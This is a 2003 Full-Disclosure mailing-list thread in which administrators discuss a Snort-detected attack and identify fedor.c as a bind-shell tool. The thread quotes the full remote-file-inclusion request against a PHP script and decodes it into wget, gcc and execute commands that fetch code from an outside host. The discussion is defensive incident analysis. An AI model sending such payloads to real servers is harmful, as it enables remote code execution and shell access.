[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <003301c3b27b$3b4b0680$30bde7c1@isageek.com>
From: andrei at fq.ro (Andrei Galca-Vasiliu)
Subject: http://xfteam.net/fedor.c - Anyone seen this before??
http://xfteam.net/fedor.c
/*
bindtty - like bindshell, but with tty
Features:
- it can handle any number of clients
- allocates tty for each session
- no using termios.h/tty.h: compiles on most of gccs
- linux specific ;(
by sd <sd@...cz>
*/
i guess this says it all... it binds a shel on a port (7832 in this case)
used by scriptkiddies to gain shell access where they can`t install rootkits
or add users.
--
Andrei Galca-Vasiliu
Customer Support
Brasov Branch
Romania Data Systems
T: +402 68 474133 F: +402 68 474133
www.rdsnet.ro
--
Privileged/Confidential Information may be contained in this message.
If you are not the addressee indicated in this message (or responsable
for delivery of the message to such person), you may not copy or
deliver this message to anyone. In such a case, you should destroy
this message and kindly notify the sender by reply e-mail.
--
----- Original Message -----
From: <allan.vanleeuwen@...ngemail.nl>
To: <full-disclosure@...ts.netsys.com>
Sent: Monday, November 24, 2003 12:14 PM
Subject: RE: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this
before??
> Well ...
>
> Xfteam.net resolves fine for me ...(IP 69.56.243.146)
> There's a website with a few files for download ... One of them was
detected
> as a linux virus by my NAV :)
> There's a folder 'forum' which looks like a portugese hackers hideout ...
> Not very much posted there though ...
>
> My 2c.
>
> -----Original Message-----
> From: Dan [mailto:dan@...kedbox.net]
> Sent: maandag 24 november 2003 10:28
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this
> before??
>
>
> Hi,
> Our Snort picked up an interesting attempt to download, compile and
execute.
> Noting also the fact that the sub dir its attempting to access has not
been
> there for over 4 months(/logjam/)?
>
> Has anyone actually seen what this fedor.c is? I have done some google'ing
> but
> it comes up blank.
>
> Has anyone else noticed this kindof request recently?
>
> Is it just me or is xfteam.net not resolving anyway?
>
> Orignal HTTP request:
> GET /logjam/showhits.php?
>
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://x
>
fteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%
> 20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
>
> Breaking this down we get(twice):
> uname -a
> cd /tmp
> wget http://xfteam.net/fedor.c
> gcc -o f fedor.c
> ./f
>
>
> Regards,
> Daniel.
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> ===========================================================
> De informatie opgenomen in dit bericht kan vertrouwelijk zijn en is alleen
> bestemd voor de geadresseerde. Indien u dit bericht onterecht ontvangt,
> wordt u verzocht de inhoud niet te gebruiken en de afzender direct te
> informeren door het bericht te retourneren. Hoewel Orange maatregelen
heeft
> genomen om virussen in deze email of attachments te voorkomen, dient u ook
> zelf na te gaan of virussen aanwezig zijn aangezien Orange niet
> aansprakelijk is voor computervirussen die veroorzaakt zijn door deze
> email..
>
> The information contained in this message may be confidential and is
> intended to be only for the addressee. Should you receive this message
> unintentionally, please do not use the contents herein and notify the
sender
> immediately by return e-mail. Although Orange has taken steps to ensure
that
> this email and attachments are free from any virus, you do need to verify
> the possibility of their existence as Orange can take no responsibility
for
> any computer virus which might be transferred by way of this email.
> ===========================================================
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists